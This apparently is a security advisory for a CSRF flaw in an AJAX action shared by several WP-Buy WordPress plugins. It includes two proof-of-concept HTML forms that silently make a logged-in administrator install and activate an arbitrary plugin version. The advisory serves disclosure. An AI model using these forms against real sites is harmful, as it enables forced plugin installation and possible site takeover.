Multiple WP-Buy Plugins – Arbitrary Plugin Installation/Activation via CSRF

Description

The "cp_plugins_do_button_job_later_callback" AJAX action, from multiple plugins of the WP-Buy vendor, was lacking CSRF check, allowing attackers to make a logged in administrator install and active arbitrary plugins (including specific version) from the WordPress repository which could lead to more critical vulnerabilities like RCE.

Proof of Concept

Installation:
<html>
    <body>
        <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
            <input type="hidden" name="action" value="do_button_job_later" />
            <input type="hidden" name="slug" value="wpscan.1.14.4" />
            <input type="submit" name="submit" value="submit" />
        </form>
    </body>
</html>

Activation:
<html>
    <body>
        <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
            <input type="hidden" name="action" value="do_button_job_later" />
            <input type="hidden" name="plugin_file" value="wpscan/wpscan.php" />
            <input type="submit" name="submit" value="submit" />
        </form>
    </body>
</html>